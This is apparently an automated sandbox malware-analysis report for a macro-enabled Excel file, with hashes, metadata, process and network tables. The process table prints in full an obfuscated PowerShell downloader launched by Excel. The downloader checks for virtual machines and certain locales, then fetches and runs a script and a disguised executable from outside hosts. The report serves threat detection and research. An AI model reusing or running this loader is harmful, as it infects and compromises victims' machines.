File name: | 8cc628b0f627cb32a037cb03686f117af1cf1a17303f731662a88302b8cf9f34.xlsm |
Full analysis: | https://app.any.run/tasks/02a96651-32f3-4139-ac7b-320e16496747 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 02:12:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | 8D4BB358D07A3E8C1EE29265FD7FDE9F |
SHA1: | 607FD2A6C1F0A0F727EF0234AE3E656510A6A644 |
SHA256: | 8CC628B0F627CB32A037CB03686F117AF1CF1A17303F731662A88302B8CF9F34 |
SSDEEP: | 1536:lVH0IxkGawC3hskRSSuclIyTPHkDD+WZbmC2PqpMagFWk9KCPqBdCFs9iYNxga5t:lVH1WGhIRSSuclIyoDDllpMagcksOqBh |
.xlsm | | | Excel Microsoft Office Open XML Format document (with Macro) (50.8) |
---|---|---|
.xlsx | | | Excel Microsoft Office Open XML Format document (30) |
.zip | | | Open Packaging Conventions container (15.4) |
.zip | | | ZIP compressed archive (3.5) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x3369e567 |
ZipCompressedSize: | 421 |
ZipUncompressedSize: | 1389 |
ZipFileName: | [Content_Types].xml |
Creator: | Administrator |
---|
LastModifiedBy: | Administrator |
---|---|
CreateDate: | 2019:06:06 07:25:07Z |
ModifyDate: | 2019:06:13 13:04:29Z |
Application: | Microsoft Excel |
DocSecurity: | None |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | Sheet1 |
Company: | - |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 16.03 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3372 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2848 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c function a($a){ return [char]$a; };$ijsd='';59,105,102,40,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,32,45,111,114,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,79,124,67,78,124,85,65,124,66,89,124,82,85,34,41,41,123,32,101,120,105,116,59,32,125,59,36,120,103,106,115,101,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,52,48,53,48,54,48,46,106,115,34,59,36,116,122,117,106,98,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,83,107,121,112,101,65,112,112,54,52,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,107,111,104,101,46,101,118,101,110,45,97,105,114,46,99,111,109,47,63,110,101,101,100,61,106,115,105,38,118,105,100,61,101,120,51,38,106,103,101,122,34,41,124,111,117,116,45,102,105,108,101,32,36,120,103,106,115,101,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,120,103,106,115,101,59,125,99,97,116,99,104,123,125,59,116,114,121,123,32,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,98,111,120,46,116,104,101,114,117,115,116,105,99,115,97,110,100,98,111,120,46,99,111,109,47,113,117,105,116,63,100,98,122,120,34,44,36,116,122,117,106,98,41,59,32,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,116,122,117,106,98,59,125,99,97,116,99,104,123,125,59,59|%{$fbwxd=a($_);$ijsd+=$fbwxd};iex $ijsd; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3372 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRF7CA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SHGY7LMVO72Y55614EF4.temp | — | |
MD5:— | SHA256:— | |||
2848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12043e.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2848 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2848 | powershell.exe | GET | — | 31.214.157.24:80 | http://kohe.even-air.com/?need=jsi&vid=ex3&jgez | NL | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2848 | powershell.exe | 31.214.157.24:80 | kohe.even-air.com | easystores GmbH | NL | unknown |
Domain | IP | Reputation |
---|---|---|
kohe.even-air.com |
| unknown |